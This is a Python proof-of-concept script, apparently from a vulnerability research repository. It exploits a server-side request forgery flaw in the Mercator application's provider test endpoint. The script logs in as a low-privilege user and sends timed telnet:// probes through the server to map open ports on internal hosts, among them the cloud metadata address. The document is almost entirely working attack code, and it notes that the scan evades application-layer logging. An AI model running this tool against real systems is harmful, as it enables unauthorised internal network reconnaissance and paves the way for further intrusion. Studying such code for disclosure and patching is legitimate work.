README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Mercator SSRF Port Scanner — TCP port enumeration via the unvalidated
`provider` URL of `ConfigurationController::testProvider`.
Method
------
The vulnerable controller calls libcurl on the attacker-supplied URL with
a 10-second timeout. By using the `telnet://` scheme, libcurl performs a
plain TCP connection and waits for the server to speak first — sending no
application-layer payload at all. Two observable outcomes:
* TCP RST received quickly (~0.15 s) -> CLOSED: the port is not accepting connections
* No reply within 10 seconds (~10 s) -> OPEN: the port accepted the TCP connection
Because no HTTP, gopher, Redis or other protocol bytes are sent, the scan
is essentially invisible to application-layer logs on the target — only
the raw TCP handshake is visible. In rare environments, a firewall that
silently drops packets (a "filtered" port) also runs into the 10-second
timeout and is reported as OPEN; this is an acceptable ambiguity for
enumeration purposes.
Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role (`PermissionRoleTableSeeder.php`), so a regular
low-privilege account is sufficient.
Usage
-----
./bin/python3 ssrf_portscan.py \\
--base http://127.0.0.1:8000 \\
--user lowuser --password 'Lowuser123!' \\
--target 127.0.0.1 --ports 22,80,443,3306,6379,8000
# Port range
./bin/python3 ssrf_portscan.py ... --target 10.0.0.5 --ports 1-1024
# Explicit list of host:port (each entry MUST carry a port)
./bin/python3 ssrf_portscan.py ... --endpoints 169.254.169.254:80,10.0.0.5:6379
"""
import argparse
import re
import sys
import time
import warnings
# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")
import requests
import urllib3
urllib3.disable_warnings()
# Captures the value of a `name="_token"` attribute; login() reads it from
# the /login page. The pattern requires `value=` to follow `name=` directly,
# separated only by whitespace.
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
# Captures the `content` of a `name="csrf-token"` attribute; login() tries
# this first on the post-login page and falls back to LOGIN_TOKEN_RE.
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
# Threshold (seconds) used by probe() to classify a port. Below = TCP RST
# received fast (CLOSED). Above = curl hit its 10s timeout (OPEN/filtered).
# Local-loop RSTs round-trip <0.5s; 8.0 leaves a comfortable margin on both
# sides.
OPEN_THRESHOLD = 8.0
# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────
def log(message):
    """Print a status line on stderr, leaving stdout for result rows only."""
    stream = sys.stderr
    print(message, file=stream)
def die(message):
    """Report a fatal error through log() and terminate with exit status 1."""
    log(f"[!] {message}")
    # Equivalent to sys.exit(1): both raise SystemExit with code 1.
    raise SystemExit(1)
def login(session, base, user, password):
    """Log in through the web form and return a CSRF token for later posts.

    Fetches ``{base}/login``, extracts the form token with LOGIN_TOKEN_RE and
    posts the credentials with redirects followed. The token returned comes
    from the post-login page (CSRF_META_RE first, LOGIN_TOKEN_RE as a
    fallback). A summary of the login, including the session cookies and the
    token, is written via log(). Any failure ends the run through die().
    """
    login_url = f"{base}/login"

    form_page = session.get(login_url, timeout=10)
    form_token = LOGIN_TOKEN_RE.search(form_page.text)
    if form_token is None:
        die("CSRF token not found on /login")

    credentials = {
        "_token": form_token.group(1),
        "login": user,
        "password": password,
    }
    landing = session.post(
        login_url, data=credentials, timeout=10, allow_redirects=True,
    )
    # Ending up on /login again after the redirects is treated as a rejected
    # login.
    if landing.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")

    token_match = CSRF_META_RE.search(landing.text)
    if token_match is None:
        token_match = LOGIN_TOKEN_RE.search(landing.text)
    if token_match is None:
        die("CSRF token not found after login")
    csrf = token_match.group(1)

    log("[+] login")
    log(f" user : {user}")
    for cookie in session.cookies:
        log(f" cookie : {cookie.name}={cookie.value}")
    log(f" csrf token : {csrf}")
    return csrf
# ── SSRF port scan ──────────────────────────────────────────────────────────
def require_configure(session, base):
    """Abort the run when the configuration page answers HTTP 403.

    Requests the `cve` tab of ``{base}/admin/config/parameters``. A 403 is
    reported as a missing `configure` permission via die(); every other
    status code is accepted without further checks.
    """
    response = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
    forbidden = response.status_code == 403
    if forbidden:
        die("account lacks the 'configure' permission")
def probe(session, base, csrf, target):
    """Send one telnet:// probe and classify the port by response time.

    Args:
        session: logged-in HTTP session (as returned to main() after login()).
        base: base URL of the application, without a trailing slash.
        csrf: CSRF token sent as the `_token` form field.
        target: 'host:port' string placed into the telnet:// provider URL.

    Returns:
        A ``(state, elapsed_seconds)`` tuple where state is "OPEN" when the
        POST took longer than OPEN_THRESHOLD seconds and "CLOSED" otherwise.

    Raises:
        Whatever the session raises for a failed or timed-out request
        (main() handles ``requests.RequestException``).
    """
    config_url = f"{base}/admin/config/parameters"
    form = {
        "_token": csrf,
        "_method": "PUT",
        "active_tab": "cve",
        "action": "test_provider",
        # NOTE(review): the trailing '#' presumably pushes anything the
        # server appends to the URL into the fragment - confirm against the
        # controller.
        "provider": f"telnet://{target}#",
    }

    # Time only the POST that triggers the probe: the page load below is
    # unrelated to the target and must not skew the OPEN/CLOSED decision.
    started = time.perf_counter()
    session.post(config_url, data=form, allow_redirects=False, timeout=15)
    elapsed = time.perf_counter() - started

    # Follow-up page load kept from the original flow (the POST does not
    # follow its redirect). It carries an explicit timeout so a stalled
    # server cannot hang the scan indefinitely.
    session.get(f"{config_url}?tab=cve", timeout=10)

    state = "OPEN" if elapsed > OPEN_THRESHOLD else "CLOSED"
    return state, elapsed
def parse_ports(spec):
    """Expand a --ports specification into an ordered, de-duplicated list.

    Args:
        spec: comma-separated ports and inclusive ranges, e.g. '22,80,443'
            or '1-1024'. Empty chunks and surrounding whitespace are ignored.

    Returns:
        List of ints in first-seen order with duplicates removed.

    Any chunk that is not an integer, lies outside 1-65535, or is a reversed
    range ends the run through die().
    """
    ports = []
    try:
        for chunk in spec.split(","):
            chunk = chunk.strip()
            if not chunk:
                continue
            low, dash, high = chunk.partition("-")
            first = int(low)
            last = int(high) if dash else first
            # Validate before expanding: rejects port 0, ports above 65535
            # and reversed ranges, and keeps a typo such as '1-99999999'
            # from materialising a huge list.
            if not 1 <= first <= last <= 65535:
                raise ValueError(chunk)
            ports.extend(range(first, last + 1))
    except ValueError:
        die(f"invalid --ports spec {spec!r} (expected e.g. '22,80,443' or '1-1024')")
    # dict preserves insertion order, so this drops duplicates while keeping
    # the order in which ports were first listed.
    return list(dict.fromkeys(ports))
def _has_valid_port(endpoint):
    """Return True when *endpoint* ends in ':<port>' with 1 <= port <= 65535."""
    # Only inspect the text after a closing ']' so the colons inside a
    # bracketed IPv6 literal such as '[::1]' are not taken for a port.
    tail = endpoint.rsplit("]", 1)[-1]
    _, colon, port = tail.rpartition(":")
    if not colon or re.fullmatch(r"[0-9]{1,5}", port) is None:
        return False
    return 1 <= int(port) <= 65535


def build_targets(args):
    """Turn the parsed CLI arguments into the list of 'host:port' targets.

    Args:
        args: argparse namespace providing `endpoints`, `target` and `ports`.

    Returns:
        The stripped --endpoints entries when --endpoints is given, otherwise
        one '<target>:<port>' string per port from parse_ports(args.ports).

    Invalid or incomplete input ends the run through die().
    """
    if args.endpoints:
        endpoints = [e.strip() for e in args.endpoints.split(",") if e.strip()]
        # A telnet:// URL with a missing or empty port makes libcurl fall
        # back to 23, silently mis-scanning. Refuse such entries (and
        # non-numeric or out-of-range ports) rather than lie.
        bad = [e for e in endpoints if not _has_valid_port(e)]
        if bad:
            die(f"--endpoints entries need an explicit numeric ':port' (1-65535) -> "
                f"{', '.join(bad)} "
                f"(use --target <host> --ports <list> to scan a host)")
        return endpoints
    if not args.target or not args.ports:
        die("need --endpoints, or --target + --ports")
    return [f"{args.target}:{p}" for p in parse_ports(args.ports)]
def main():
    """Parse the command line, log in, and print one result row per target.

    Status messages go to stderr through log(); the result table (header,
    separator, one row per target) goes to stdout. A probe that raises
    ``requests.RequestException`` is reported as an ERROR row and the scan
    continues with the next target.
    """
    ap = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--target", help="host scanned (combined with --ports)")
    ap.add_argument("--ports", help="port list/range, e.g. '22,80,443' or '1-1024'")
    ap.add_argument("--endpoints",
                    help="explicit 'host:port,host:port,...' (each needs a port)")
    ap.add_argument("--delay", type=float, default=0.0,
                    help="seconds to sleep between probes (default: 0)")
    args = ap.parse_args()

    # Every URL is built as f"{base}/...", so a trailing slash on --base
    # would otherwise produce '//login'-style paths.
    base = args.base.rstrip("/")
    targets = build_targets(args)

    # The context manager closes the session's connections on every exit
    # path, including the SystemExit raised by die().
    with requests.Session() as session:
        session.verify = False  # TLS certificate verification is disabled
        csrf = login(session, base, args.user, args.password)
        require_configure(session, base)
        log(f"[*] scanning {len(targets)} target(s) via SSRF telnet probe")
        print(f"{'TARGET':<28} {'STATE':<8} TIME")
        print("-" * 50)
        for index, t in enumerate(targets):
            # Sleep *between* probes: not before the first one, not after
            # the last one, and also after a probe that ended in an error.
            if index and args.delay > 0:
                time.sleep(args.delay)
            try:
                state, elapsed = probe(session, base, csrf, t)
            except requests.RequestException as e:
                print(f"{t:<28} {'ERROR':<8} {e}")
                continue
            print(f"{t:<28} {state:<8} {elapsed:.2f}s")
if __name__ == "__main__":
    # Script entry point: run main() and turn the two expected failure modes
    # into a one-line message plus exit status 1 via die().
    try:
        main()
    except requests.RequestException as exc:
        die(f"could not reach Mercator: {exc}")
    except KeyboardInterrupt:
        die("interrupted")